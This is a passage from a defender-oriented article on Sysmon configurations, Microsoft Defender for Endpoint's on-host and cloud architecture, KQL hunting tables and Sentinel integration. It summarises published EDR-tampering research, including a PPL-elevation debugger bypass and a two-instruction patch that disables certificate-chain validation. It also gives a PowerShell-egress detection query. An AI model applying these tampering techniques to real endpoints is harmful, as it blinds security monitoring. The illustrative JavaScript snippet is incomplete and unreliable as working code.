Olaf Hartong's sysmon-modular was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository's design takes a different shape from the monolithic SwiftOnSecurity and NextronSystems configs: instead of one carefully-tuned XML, Hartong publishes a per-EID-per-technique module library that compiles into one of five pre-generated artifacts plus an arbitrary number of custom builds [@github-hartong-modular]. The pre-generated variants are:

sysmonconfig.xml -- the default deployment baseline.
sysmonconfig-with-filedelete.xml -- default plus the EID 23 archive variant of file delete, which preserves the deleted file in C:\Sysmon\ (volume-cost trade-off; recommend dedicated drive).
sysmonconfig-excludes-only.xml -- the verbose variant, which captures everything except a small set of well-known exclusions; useful for detection-engineering R&D on a single host.
sysmonconfig-research.xml -- the super-verbose variant, with the README's standing warning: "really DO NOT USE IN PRODUCTION!" -- this is for live-malware-sample analysis in a sandbox, not for fleet rollout.
sysmonconfig-mde-augment.xml -- the variant whose entire design intent is to augment Microsoft Defender for Endpoint's collection surface "to have as little overlap as possible" with what MDE already captures [@github-hartong-modular].

The MDE-augment config is the artifact this article keeps returning to. It is the operational answer -- maintained by a person, not by Microsoft -- to the question of which Sysmon events are worth collecting on a host that already has MDE installed. We will return to its specific contents in §10. For now, the key observation is that this config exists because of a documented absence: Microsoft has not published a per-ActionType cross-walk between MDE's Device* schema and Sysmon's manifest, so Hartong reverse-engineered one.

Side-by-side comparison

Dimension	SwiftOnSecurity/sysmon-config	NextronSystems/sysmon-config (formerly Neo23x0)	olafhartong/sysmon-modular
Author / org	SwiftOnSecurity (pseudonymous)	Florian Roth + Nextron Systems team	Olaf Hartong (and FalconForce collaborators)
Created	Feb 1, 2017	Forked Jan 2018; renamed Jul 24, 2021	Jan 13, 2018
Distribution	One monolithic XML	Two XMLs (audit + blocking)	Modular per-technique + five pre-generated builds
Design philosophy	Quality starting point, conservative	Community-maintained, blocking-aware	Tunable modular, MITRE ATT&CK-mapped
Best used for	First-time Sysmon deployment	Standalone Sysmon at scale	Sysmon alongside MDE, or per-team customization
Pre-generated v14+ blocking	No (audit only)	Yes (`sysmonconfig-export-block.xml`)	Yes (built from blocking modules)
MDE coexistence variant	No	No	Yes (`sysmonconfig-mde-augment.xml`)

Choosing among the three

The detection-engineering trade-off framing is short. Pick SwiftOnSecurity when you want a clean, well-commented starting point and you are not yet sure which events you actually need. Pick NextronSystems when you want a community-maintained baseline that already has the blocking rules for Sysmon v14+. Pick Hartong when you want fine-grained per-technique tunability or, more commonly, when you are running MDE and need Sysmon to augment rather than duplicate it.

Tactical caution worth one inline note: Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Hartong's modular approach generates a single merged XML at build time; the production fleet receives that single XML and the driver enforces it. If you are trying to run two configurations side by side -- one for the SOC's hunting, one for the platform team's audit -- pick one, merge the rules, and ship the combined product. The deployment tooling in sysmon-modular is built around exactly this constraint.

All three configurations assume the same thing: either Sysmon is the only EDR on the host (a deployment posture that exists in air-gapped, regulatory-no-cloud, or unlicensed environments) or it is augmenting an EDR whose collection surface is known. The augment case is the one where the field has converged on Hartong. To understand why, we have to look at what the other EDR -- Microsoft's own -- actually collects on the host.

6. Microsoft Defender for Endpoint: The Documented On-Host Surface

Two questions about MDE have very different answers. What does Microsoft Defender for Endpoint run on this host? has a primary-source-quality answer from Microsoft Learn. What does it actually do? has only a community-observed answer. The documented surface is the user-mode component inventory plus registry hives and event sources. The community-observed surface includes the kernel-callback inventory, the cloud TLS-pinning details, and the inter-process communication paths -- none of which Microsoft has published. Naming both halves with the right citations on each side is one of the few things this article does that other writeups skip.

The documented surface (Microsoft Learn, primary)

On every onboarded Windows endpoint, Microsoft Defender for Endpoint installs and runs a Windows service named Sense, whose display name is "Microsoft Defender for Endpoint Service" and whose backing executable is MsSense.exe. The on-host troubleshooting page documents the canonical health-check command: sc query sense [@sense-troubleshoot]. On Windows Server 2019, Server 2022, Server 2025, and Azure Stack HCI 23H2 or later, MDE is delivered as a Feature on Demand with the capability name Microsoft.Windows.Sense.Client~~~~. Microsoft documents the verification command verbatim: "DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~" [@sense-troubleshoot][@ms-server-endpoints-learn].

Onboarding state is recorded under two registry hives that Microsoft Learn names explicitly:

HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection -- the policy-driven configuration surface.
HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status -- the run-time onboarding state.

Onboarding diagnostics land in the WDATPOnboarding event source under the Application event log, with documented event IDs 5, 10, 15, 30, 35, 40, 65, and 70, each of which corresponds to a specific failure mode with a specific resolution procedure [@sense-troubleshoot]. The product installs to C:\Program Files\Windows Defender Advanced Threat Protection\ (the legacy path is preserved even after the September 2020 rebrand).

The documented surface stops here. Microsoft Learn names MsSense.exe, the Sense service, the registry hives, the event source, the Feature on Demand, and the four operating systems. Microsoft Learn does not publish a kernel-callback inventory for the MDE EDR sensor.

The community-observed surface

Past the documented boundary, what is in field-published primary sources is the user-mode binary inventory and the cloud-side TLS path. Three companion binaries sit alongside MsSense.exe:

SenseCncProxy.exe is the cloud-command-and-control proxy. This is the binary that holds the TLS connection out to Defender XDR ingest, applies the certificate-pinning policy, and shuttles agent-bound commands (live-response actions, custom-detection-rule pushes, sensor-configuration updates) back down to MsSense.exe.
SenseIR.exe is the live-response and investigation actions binary. When a SOC analyst clicks Run script or Collect investigation package in the Defender XDR portal, SenseIR.exe is the process that fulfils the request on the endpoint side.
SenseNdr.exe is the network detection and response component, responsible for endpoint-side enrichment of network observations used in the DeviceNetworkEvents table.

These binaries are not enumerated on Microsoft Learn in the same way the Sense service itself is. They are documented in MDE incident-response runbooks, in third-party reverse-engineering posts, and in the file-system signature data on any onboarded endpoint. The article treats their existence as community-observed. SenseIR.exe is corroborated by InfoGuard 2025's reverse-engineering of MDE's live-response cloud path [@infoguard-2025]; SenseNdr.exe in particular lacks an explicit community primary writeup as of 2026 -- its role here is inferred from its on-disk binary metadata and the file-system signature data on onboarded endpoints.

The kernel-side surface MDE shares with Defender Antivirus is documented in the Defender Antivirus product line [@ms-defender-av-arch]:

WdBoot.sys is the Early-Launch Antimalware (ELAM) driver. It is the first non-Windows driver to load at boot and gates which non-ELAM drivers are allowed to load after it. It is signed with the Antimalware Extended Key Usage, 1.3.6.1.4.1.311.61.4.1 [@ms-learn-elam-sample].
WdFilter.sys is the Defender Antivirus file-system minifilter. It sits alongside SysmonDrv.sys at a different Filter Manager altitude.
WdNisDrv.sys is the Network Inspection System driver, which provides the host-firewall-augmenting NIS layer.

A Windows process-protection level, introduced in Vista (as Protected Process, for DRM) and extended in Windows 8.1 (for antimalware), that prevents user-mode debugger attach, code injection, and `OpenProcess` for write from any caller that does not itself run at an equal or higher PPL signer level. Antimalware-PPL (`PROTECTED_ANTIMALWARE_LIGHT`) is the level reserved for security products signed with the Antimalware EKU; `MsSense.exe` and Sysmon v15+ both run at this level. The Windows boot-order privilege that lets a driver signed with the Antimalware EKU `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample] load before any non-ELAM driver and classify subsequent boot-start drivers as `Good`, `Bad`, or `Unknown` so the kernel can decide which to load. The ELAM driver *itself* is measured (along with the bootloader, kernel, and other early-boot artefacts) into TPM PCRs by Windows's *Measured Boot*, which is a separate boot-integrity feature; ELAM's job is to classify, not to measure. Defender Antivirus's `WdBoot.sys` is the canonical ELAM driver. Sysmon's `SysmonDrv.sys` is *not* ELAM-signed; this is the pre-driver-load horizon discussed in §12. The Authenticode Extended Key Usage `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample], issued by Microsoft to security vendors after a code-signing and behavioral review. The EKU gates two distinct things: ELAM signing eligibility (so the driver loads first) and Antimalware-PPL eligibility for the user-mode service (so the service is harder to tamper with). MDE's `MsSense.exe`, Defender Antivirus's `MsMpEng.exe`, and Sysmon v15+ all carry this signature path.

Antimalware-PPL on MsSense.exe

The MsSense.exe service runs as Antimalware-PPL -- PROTECTED_ANTIMALWARE_LIGHT in the kernel data structure. The protection level prevents an attacker with SYSTEM privileges from attaching a user-mode debugger, suspending the service, or injecting code into its address space using ordinary Windows debugging or code-injection APIs. This is the same protection level Sysmon v15+ runs at, and it is the same level Defender Antivirus's MsMpEng.exe has run at since Windows 8.1. The structural defense closes user-mode tampering as a class. The residual attack surface is kernel-mode primitives -- which is what FalconForce had to use in 2022 to debug MDE [@falconforce-2022].

The dispositive reverse-engineering primary: FalconForce 2022

Olaf Hartong and Henri Hambartsumyan, working at FalconForce, published the most-cited reverse-engineering writeup of MDE's on-host architecture in 2022. The post's TL;DR captures both the debug-bypass technique and the cloud vulnerability that resulted from applying it:

You can debug MDE running on an endpoint by running `dbgsrv.exe` and raising its PPL protection to WinTcb. This can be used to snoop on data being transmitted by MDE to the cloud. We identified a vulnerability related to missing authorization checks of data sent from the MDE endpoint to the M365 cloud, allowing anyone to send spoofed data to any M365 tenant.

The technique is precise [@falconforce-2022]. FalconForce raised the PPL signer level of Windows's PE debug server (dbgsrv.exe) to WinTcb -- a signer level higher than Antimalware-PPL -- and used the elevated debug server to attach to MsSense.exe. From inside that debug session they instrumented SspiCli!EncryptMessage, the SSPI function MDE's cloud transport uses to wrap each outbound message before TLS encryption, and captured the plaintext payloads. The plaintext capture surfaced CVE-2022-23278: a missing-authorization vulnerability in which the M365 cloud trusted whatever device-identifying claims the endpoint asserted, with no cross-check that the asserting endpoint owned the device identity it claimed [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. Microsoft patched the vulnerability on March 8, 2022, with a public acknowledgement to FalconForce: "Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure" [@msrc-cve-2022-23278].

Note: The kernel-and-Defender-Antivirus surface MDE shares (WdBoot.sys ELAM, WdFilter.sys minifilter, WdNisDrv.sys NIS) is documented. The specific callback inventory the MDE EDR sensor itself registers is not. The community's best-published primary for what MsSense.exe actually does is the FalconForce 2022 reverse-engineering writeup -- and it covers a narrow slice (TLS interception and one cloud-authorization bug), not a full callback list. The Hartong sysmonconfig-mde-augment.xml config exists as a community-curated artifact precisely because Microsoft has not published a per-ActionType-to-per-kernel-callback cross-walk. The most-cited operational config in the field is downstream of a documentation gap. This is the second aha moment of the article.

Putting the on-host pieces together

flowchart TD B["WdBoot.sys (ELAM, Antimalware EKU)"] -.boot order.-> F["WdFilter.sys (file minifilter)"] B -.boot order.-> N["WdNisDrv.sys (Network Inspection)"] F --> M["MsSense.exe (Antimalware-PPL aggregator)"] N --> M M --> IR["SenseIR.exe (Live Response)"] M --> NDR["SenseNdr.exe (Network Detection)"] M --> P["SenseCncProxy.exe (cloud forwarder)"] P -- "TLS + certificate pinning" --> C["Defender XDR ingest (regional Kusto)"]

The picture is asymmetric: the kernel-driver substrate at the top is documented in the Defender Antivirus product line; the user-mode service inventory in the middle is documented for MsSense.exe and partly documented for the companion binaries; the cloud transport at the bottom is documented at the API-contract level (TLS, certificate pinning) but the specific endpoints and the on-the-wire payload format are reverse-engineered. The community published primaries -- FalconForce 2022 above the line, InfoGuard Labs 2025 below it -- are how the field knows what they know about the cloud-bound payload. Which is the next layer.

7. The Cloud Pipeline: SenseCncProxy.exe to Defender XDR Ingest

The wire between MsSense.exe and Microsoft's cloud is TLS with certificate pinning. It is also, twice in the last four years, the place where the most interesting Defender for Endpoint vulnerabilities have lived. The 2022 round closed one of them. The 2025 round is still open as of this article's writing.

Certificate pinning and the FalconForce 2022 method

MsSense.exe does not trust whatever the Windows certificate store says about the chain to Defender XDR ingest. It pins the certificate. FalconForce's bypass is the one §6 already named: raise dbgsrv.exe to WinTcb PPL, attach the elevated debug server to MsSense.exe, instrument SspiCli!EncryptMessage to capture the plaintext payload before TLS encryption [@falconforce-2022].The specific PPL elevation technique is published in the same writeup. PPLKiller's /enablePPL patch writes the Antimalware-PPL bit into dbgsrv.exe's _EPROCESS.Protection field at the highest signer level (WinTcb). The result: a PE debug server running at a PPL level above Antimalware-PPL, with OpenProcess rights against any Antimalware-PPL target [@falconforce-2022]. This requires SYSTEM plus a kernel primitive, typically delivered via BYOVD.

The InfoGuard Labs 2025 follow-up took a different route to the same problem. Instead of reading plaintext before TLS encryption, InfoGuard patches the certificate-chain validation function in memory so the endpoint certificate is no longer checked at all. Any local TLS-stripping proxy can then intercept the wire. The verbatim patch is two CPU instructions written into CRYPT32!CertVerifyCertificateChainPolicy: "mov eax, 1; ret" -- which forces the function to return success without performing any actual chain check [@infoguard-2025].

With the pinning gate disabled, InfoGuard's team observed the on-the-wire protocol. The cloud-bound payload goes to two endpoint families: /edr/commands/cnc for command-and-control and /senseir/v1/actions/ for live-response actions. The vulnerability they then disclosed is that both endpoint families accept "data sent from the MDE endpoint to the cloud ... without validating authentication tokens, allowing a post-breach attacker with a machine's ID to hijack the command-and-control channel" [@infoguard-2025]. Microsoft's response, verbatim: "All findings were reported to the Microsoft Security Response Center (MSRC) in July 2025. However, Microsoft has classified them as low severity and has not committed to a fix" [@infoguard-2025].

FalconForce 2022 found a missing-authorization bug in the cloud's trust path. CVE-2022-23278 was patched. InfoGuard Labs 2025 found a different missing-authorization pattern in different cloud endpoints -- different bug, same class -- and the disclosure record says Microsoft has not committed to a fix. The cloud trusts whatever the endpoint claims about itself far enough that the same authorization gap keeps surfacing. The arc that began with the March 2022 spoofing-CVE patch is not closed. This is the third aha moment of the article, surfaced again in §11.

What the cloud does on arrival

Once SenseCncProxy.exe has TLS-shipped the event over the wire to the regional Defender XDR ingest endpoint, two things happen on the cloud side. First, the event lands in the Advanced Hunting Kusto cluster. Microsoft Learn's verbatim freshness claim is: "Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services" [@advanced-hunting-overview]. "Almost immediately" is empirically a few seconds in steady state, which is exactly what Maya saw in §1: a row with Timestamp three seconds in the past.

Second, the event is replicated for use by Microsoft's built-in detection rules, MITRE-mapped queries, and the cross-domain correlation surface that joins endpoint events to email events, identity events, and cloud-application events. The cross-domain join is one of the most-cited reasons enterprises stay on the licensed product rather than fall back to standalone Sysmon: KQL can join DeviceProcessEvents to EmailEvents to IdentityLogonEvents in one query, and Sysmon-only deployments cannot do that without a separate SIEM doing the cross-source enrichment.

Data residency is documented at the regional level in the MDE configure-server-endpoints page: "data is stored in the US for customers in the USA; in EU for European customers; and in the UK for customers in the United Kingdom" [@ms-server-endpoints-learn]. Retention in-portal is the same quota for all geographies: "Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data" [@advanced-hunting-overview]. Past 30 days, the customer has to extend the retention surface via Microsoft Sentinel's per-table archiving, which is the operational story §9 picks up.

The event's journey, end to end

sequenceDiagram participant K as Kernel callback (WdFilter or SysmonDrv) participant S as MsSense.exe (Antimalware-PPL) participant P as SenseCncProxy.exe participant CP as CRYPT32!CertVerifyCertificateChainPolicy participant C as Defender XDR ingest (regional Kusto) participant Q as DeviceProcessEvents table K->>S: Synchronous callback notification Note over S: Enrich (parent PID, hashes, identity, ProcessGuid) S->>S: SspiCli!EncryptMessage (FalconForce 2022 plaintext capture point) S->>P: IPC to cloud forwarder P->>CP: Validate Defender XDR certificate chain CP-->>P: Pinned chain OK (InfoGuard 2025 bypass: patch CP to return 0 unconditionally) P->>C: HTTPS POST /edr/commands/cnc or /senseir/v1/actions/ C->>Q: Write into Kusto cluster Note over Q: "Almost immediately" -- seconds end to end Q-->>K: Queryable via KQL

The diagram is annotated with the two community-disclosed interception points because they are the two places the field has actually been able to observe what is on the wire. Between SspiCli!EncryptMessage (where the plaintext payload exists) and CRYPT32!CertVerifyCertificateChainPolicy (where the certificate chain gets validated), the path is otherwise opaque to external researchers. The Microsoft-published side of the story is the contractual one: TLS, certificate pinning, regional ingest, Kusto cluster, KQL exposure. The reverse-engineered side fills in the rest.

Within seconds, the event appears as a row in DeviceProcessEvents. The reader-side schema is where the analyst lives. So: what columns?

8. Six `Device*` Tables and One Worked KQL Query

Every detection rule in Microsoft Defender XDR, every hunting query in Microsoft Sentinel, and every analyst pivot Maya does on her console is a KQL query against six load-bearing tables. Knowing those six tables is the price of admission to the Defender XDR field.

Microsoft's data-explorer query language, originally built for Azure Data Explorer (formerly Kusto). KQL reads as a pipeline of operators -- `where`, `project`, `summarize`, `join`, `order by` -- left to right. Advanced Hunting in Microsoft Defender XDR and analytics queries in Microsoft Sentinel both expose the same KQL dialect; the same query text can be moved between the two surfaces with only the table-name namespace changing [@advanced-hunting-overview][@sentinel-xdr-connector].

The six tables

The six tables that this article calls "load-bearing" are the ones that map most cleanly to Sysmon's manifest and that detection rules join against most often:

DeviceProcessEvents -- the canonical reader-side analogue of Sysmon's EID 1 (ProcessCreate) and EID 5 (ProcessTerminate). The schema reference page names roughly fifty columns including Timestamp, DeviceId, DeviceName, ActionType, FileName, FolderPath, SHA1, SHA256, MD5, FileSize, ProcessId, ProcessCommandLine, ProcessIntegrityLevel, ProcessTokenElevation, ProcessCreationTime, AccountSid, AccountName, AccountUpn, LogonId, and the full InitiatingProcess* family of parent-process columns [@deviceprocessevents-table].
DeviceNetworkEvents -- the analogue of Sysmon EID 3 (NetworkConnect) plus EID 22 (DNSEvent) and the MDE-only network-protection telemetry. Columns include RemoteIP, RemotePort, RemoteUrl, LocalIP, LocalPort, Protocol, RemoteIPType, and the InitiatingProcess* family [@sentinel-xdr-connector].
DeviceFileEvents -- the analogue of Sysmon EIDs 11 (FileCreate), 15 (FileCreateStreamHash), 23 (FileDelete archived), and 26 (FileDeleteDetected).
DeviceImageLoadEvents -- the analogue of Sysmon EID 7 (ImageLoad).
DeviceRegistryEvents -- the analogue of Sysmon EIDs 12-14 (RegistryEvent family).
DeviceEvents -- the miscellaneous catch-all. AMSI scan results, exploit-protection events, ASR rule fires, Network Protection blocks, and other MDE-specific events that do not fit cleanly into any of the per-event-class tables surface here as ActionType discriminators.

Past the six core tables there are siblings the article does not walk in detail but that detection engineers query alongside: DeviceLogonEvents (interactive, remote-interactive, network logons), DeviceFileCertificateInfo (Authenticode signer information), DeviceInfo and DeviceNetworkInfo (asset and posture). The cross-domain tables that the Defender XDR portal exposes -- AlertInfo, AlertEvidence, IdentityLogonEvents, EmailEvents, CloudAppEvents -- are also queryable from the same surface, and the cross-domain join is one of the load-bearing reasons SOC teams move queries from a standalone SIEM into Advanced Hunting [@sentinel-xdr-connector].

Sysmon EID to MDE table cross-walk

The cross-walk is the table detection engineers actually need at their desk. Every row is a Sysmon EID, the MDE table the analogous event lands in, the ActionType discriminator inside that table, and a fidelity rating relative to Sysmon's manifest -- because the MDE schema does not surface every Sysmon field, and the fidelity gaps are where Hartong's MDE-augment config earns its keep.

Sysmon EID	MDE table	ActionType	Fidelity vs Sysmon	Hartong-augment disposition
1 ProcessCreate	DeviceProcessEvents	ProcessCreated	Full	Drop (MDE covers)
3 NetworkConnect	DeviceNetworkEvents	ConnectionSuccess	Full	Drop
7 ImageLoad	DeviceImageLoadEvents	ImageLoaded	Full	Drop
8 CreateRemoteThread	DeviceEvents	RemoteThreadCreated	Truncated (no SourceImage hash)	Keep verbose
9 RawAccessRead	(none)	--	Omitted	Keep
10 ProcessAccess	DeviceEvents	OpenProcessApiCall	Truncated (no GrantedAccess mask)	Keep verbose, narrow targets
11 FileCreate	DeviceFileEvents	FileCreated	Full	Drop
12-14 RegistryEvent	DeviceRegistryEvents	RegistryValueSet etc.	Full	Drop
17-18 PipeEvent	(none)	--	Omitted	Keep
19-21 WmiEvent	(none)	--	Omitted	Keep
22 DNSEvent	DeviceNetworkEvents	DnsQuery	Full	Drop
23 FileDelete (archive)	DeviceFileEvents	FileDeleted	Partial (no archive)	Keep archive variant on selected paths
26 FileDeleteDetected	DeviceFileEvents	FileDeleted	Full	Drop
27 FileBlockExecutable	(none)	--	Omitted (MDE has separate prevent surface)	Keep if Sysmon is enforcing

The fidelity column is the operational answer to "do I need Sysmon if I have MDE?" Where MDE is Full, Sysmon duplicates. Where MDE is Truncated, Sysmon adds the fields MDE drops. Where MDE is Omitted, Sysmon is the only collection mechanism in the host's telemetry surface. This is the cross-walk that Hartong's sysmonconfig-mde-augment.xml implements as XML rules.

The Kusto Hunt: PowerShell instances that called out within sixty seconds of spawn

The single most-frequently-cited hunting query in the Defender XDR field is some variation of the following. The query joins DeviceProcessEvents to DeviceNetworkEvents on (DeviceId, InitiatingProcessId) and surfaces every PowerShell instance that opened an outbound network connection within sixty seconds of being spawned. This is the query that turns Maya's hunch ("that base64-encoded command looks bad") into a SIEM-routable signal:

// The Kusto Hunt: PowerShell instances that called out within
// 60s of process create, joined on (DeviceId, InitiatingProcessId).
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
| project DeviceId, ProcessId, ProcessCreationTime = Timestamp,
          ParentImage = InitiatingProcessFileName,
          ParentCmd   = InitiatingProcessCommandLine,
          ProcessCmd  = ProcessCommandLine,
          User        = AccountUpn
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > ago(24h)
    | where ActionType == "ConnectionSuccess"
    | project DeviceId, InitiatingProcessId, NetTime = Timestamp,
              RemoteIP, RemotePort, RemoteUrl
) on DeviceId, $left.ProcessId == $right.InitiatingProcessId
| where (NetTime - ProcessCreationTime) between (0s .. 60s)
| where RemoteIP !startswith "10."
    and RemoteIP !startswith "192.168."
    and not(RemoteIP matches regex "^172\\.(1[6-9]|2[0-9]|3[0-1])\\.")
| project DeviceId, ProcessCreationTime, NetTime,
          ParentImage, ProcessCmd, RemoteIP, RemotePort, RemoteUrl, User
| order by NetTime desc

The query is twelve operative lines and exercises four of KQL's most useful primitives: join (on a tuple key), between (for time-window matching), !startswith and the regex check (for RFC 1918 exclusion), and project (for column shaping). The between (0s .. 60s) is the crux. A legitimate PowerShell launched by a logon script may also produce a network connection within the same minute -- the filter is necessary but not sufficient. Adding ParentImage in ("winword.exe", "excel.exe", "outlook.exe") narrows the hunt to the Office-spawning-PowerShell pattern that fits the Emotet and Qbot families. Adding RemoteUrl in (~CustomTI) narrows the hunt further to known-bad indicators from the tenant's threat-intelligence list.

{` // JavaScript that walks through the logic of the KQL hunt. // The actual query runs in Advanced Hunting; this runs in your browser // so you can see the join semantics with a small synthetic dataset.

const processEvents = [ { DeviceId: "D1", ProcessId: 7700, Timestamp: 100, FileName: "powershell.exe", InitiatingProcessFileName: "WINWORD.EXE", ProcessCommandLine: "powershell.exe -enc JABzAD0A..." }, { DeviceId: "D2", ProcessId: 4422, Timestamp: 200, FileName: "powershell.exe", InitiatingProcessFileName: "explorer.exe", ProcessCommandLine: "powershell.exe -Help" }, ];

const networkEvents = [ { DeviceId: "D1", InitiatingProcessId: 7700, Timestamp: 130, ActionType: "ConnectionSuccess", RemoteIP: "185.243.115.84", RemotePort: 443 }, { DeviceId: "D2", InitiatingProcessId: 4422, Timestamp: 215, ActionType: "ConnectionSuccess", RemoteIP: "10.0.0.5", RemotePort: 443 }, ];

function isPrivate(ip) { return ip.startsWith("10.") || ip.startsWith("192.168.") || /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip); }

console.log(JSON.stringify(hits, null, 2)); // Expected output: one hit on D1 (WINWORD-spawned powershell to public IP); // D2 is filtered out (RemoteIP is RFC 1918 private). `}

The semantic of the KQL is the semantic of the JavaScript: a relational join on a composite key, filtered by a time-window predicate and a network-class predicate. The KQL query is shorter and faster; the JavaScript is what the join is actually doing. Once a reader internalizes this pattern, the rest of the Advanced Hunting surface unfolds from it -- every other detection in the field is a variant of "join Device* table A to Device* table B on (DeviceId, InitiatingProcessId), filter by time and content."Advanced Hunting per-query quotas are 100,000 rows of returned data and 10 minutes of execution time per call [@advanced-hunting-overview]. The practical workaround for queries that exceed either limit is to pre-filter with a tighter time window (Timestamp > ago(1h) instead of ago(24h)), or to push the heavy aggregation into a Sentinel scheduled analytics rule that runs every hour and materializes the result table for further hunting.

The same query, the same columns, the same six tables surface in two different places: the Defender XDR portal itself (at security.microsoft.com legacy or defender.microsoft.com current), and inside Microsoft Sentinel via the Defender XDR connector. The two surfaces are not the same.

9. The Microsoft Sentinel Integration Model

The same KQL query runs in two different places, but the economics of the two places are not the same, and that distinction is the one that catches detection engineers off guard. In-portal Advanced Hunting and Microsoft Sentinel both expose the same Device* tables. They do not expose them with the same retention, the same join surface, or the same cost.

The connector contract

Microsoft Sentinel's Defender XDR connector (the post-Ignite-2023 successor to the legacy Microsoft 365 Defender connector) streams Microsoft Defender XDR incidents, alerts, and Advanced Hunting events into Sentinel's Log Analytics workspace. Microsoft Learn's verbatim definition is: "The Defender XDR connector allows you to stream all Microsoft Defender XDR incidents, alerts, and advanced hunting events into Microsoft Sentinel and keeps incidents synchronized between both portals" [@sentinel-xdr-connector]. The connector exposes per-table streaming, meaning the operator picks which Device* tables to bring into Sentinel and pays per-GB ingestion only on those tables.

The connector also handles the legacy-connector transition: when enabled, "any Microsoft Defender components' connectors that were previously connected are automatically disconnected in the background" [@sentinel-xdr-connector]. If a tenant was using the legacy Microsoft Defender ATP connector or per-product Defender connectors, those get retired when the unified Defender XDR connector takes over. This is the cleanup detail that catches teams off guard during the migration -- they expect both connectors to coexist for the transition window, and they do not.

Three asymmetries

The in-portal Advanced Hunting surface and the Sentinel surface differ on three practitioner-level axes:

Dimension	In-portal Advanced Hunting	Sentinel + Defender XDR connector
Retention	30 days of raw data per query [@advanced-hunting-overview]	Configurable per-workspace, up to 12 years archive [@sentinel-xdr-connector][@ms-log-analytics-archive]
Query surface	Six core `Device*` tables plus cross-domain `AlertInfo` / `EmailEvents` / `IdentityLogonEvents` / `CloudAppEvents`	Six core `Device*` tables (per-table selection) plus the entire Log Analytics workspace -- third-party logs, custom tables, ASIM-normalized data
Cost	Included with MDE Plan 2 license	Per-GB Sentinel ingestion (current GA tier) plus per-GB archive
Detection authoring	Custom detection rules; in-portal advanced-hunting-to-alert promotion	Scheduled analytics rules; SOAR playbook triggers; automation rules
Cross-tenant hunting	Tenant-bound only	Possible via Lighthouse / Sentinel Workspaces aggregation
Live response triggers	In-portal action surface	Via Logic Apps / Defender API connector

The in-portal economics are predictable: the queries are included with the license, the retention is uniform at thirty days, the surface is the six tables plus the cross-domain entity catalogue. The Sentinel economics are flexible but billable: longer retention, more table coverage, more automation, all of which carry per-GB ingestion charges. The choice is operational: which queries does the team need to run on data older than thirty days?

When each surface is the right one

For the SOC-analyst-driven, real-time threat-hunting workflow that §1 modeled with Maya -- thirty days back, six tables, cross-domain join into AlertInfo -- the in-portal Advanced Hunting surface is the obvious fit. For the longer-retention, multi-source, automated-analytic-rule workflow -- where detection engineers want a scheduled rule that joins DeviceProcessEvents to a third-party identity log on a normalized schema -- the Sentinel surface is the obvious fit.

The two surfaces are not exclusive. The most-cited operational pattern in 2026 is to keep the in-portal surface as the SOC-analyst hunting console (retention 30 days, no cost) and to run the Defender XDR connector into Sentinel for the subset of tables the team needs longer retention or analytics-rule scheduling on. Per-table selection keeps the per-GB ingestion bill predictable.The Sentinel connector preserves table names but namespaces them inside the Log Analytics workspace; DeviceProcessEvents in Sentinel is the same shape as DeviceProcessEvents in the Defender XDR portal, and most queries port between the two surfaces unchanged. Some columns are renamed at the connector boundary -- the most common gotcha is the time-zone and timestamp representation -- but the join semantics and the cross-walk to Sysmon EIDs do not change.

The portal-URL transition

A small operational detail worth naming: the Defender XDR portal lives at both security.microsoft.com (legacy, still functional) and defender.microsoft.com (current). The new URL was announced as part of the Microsoft 365 Defender to Microsoft Defender XDR rebrand at Ignite 2023 [@defender-xdr-ms-learn][@ms-ignite-2023-blog]. The rebrand changed neither the KQL substrate nor the Device* schema; queries written against the legacy URL behave identically against the new URL. This is the disambiguation §1 alluded to in its layer-7 description: the same KQL query, the same tables, against either URL.

Two query surfaces, six tables, twenty-nine Sysmon EIDs, and one operational question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone? That is §10.

10. Sysmon Plus MDE: Three Coexistence Patterns

This is the operational question of the article. The community has converged on three answers, and one of them is wrong for almost every MDE-licensed environment. The three options, in order of increasing complexity and -- in most enterprise contexts -- decreasing prevalence:

Option A: Sysmon only, no MDE

Used in air-gapped environments, unlicensed environments, and regulatory contexts that prohibit cloud-side telemetry. Sysmon on its own produces a complete event stream into the local Windows event log, which a downstream collector (Windows Event Forwarding to a central collector, Splunk's Universal Forwarder, Wazuh's Windows agent, the Elastic Endpoint integration) picks up and ships to a customer-controlled SIEM. The trade-off: no cross-tenant correlation, no cloud-side threat-intelligence join, no EtwTi (kernel security ETW provider) consumption, no Microsoft-authored detection rules. The customer owns every rule themselves.

This is the right answer in a small set of contexts and the wrong answer in the licensed-enterprise context where MDE is already deployed.

Option B: MDE only, no Sysmon

The Microsoft-recommended baseline for licensed environments. MDE's Device* schema covers the high-value Sysmon EID surface -- 1, 3, 7, 10, 11, 12-14 -- at full or near-full fidelity, and MDE adds the layers Sysmon does not have: cloud-side correlation, cross-domain joins (email, identity, cloud apps), Microsoft-authored built-in detection rules with continuous tuning, the AlertInfo/AlertEvidence evidence graph, and the SOC-actionable surface (device isolation, live response, automated investigation) [@mde-ms-learn][@ms-mitre-2024-blog].

For most MDE-Plan-2-licensed organizations without a mature detection-engineering team, Option B is the right baseline. The trade-off is that the truncations and omissions in the Device* schema -- the ProcessAccess GrantedAccess mask Sysmon EID 10 surfaces verbatim that MDE drops, the WMI consumer expressions Sysmon EIDs 19-21 capture that MDE does not surface, the RawAccessRead and PipeEvent classes Sysmon captures that MDE omits entirely -- are not available to the team's custom hunting queries. For an organization without the engineering capacity to build hunting rules on those verbose surfaces, this is rarely a binding constraint.

Option C: MDE plus tuned Sysmon (Hartong's MDE-augment)

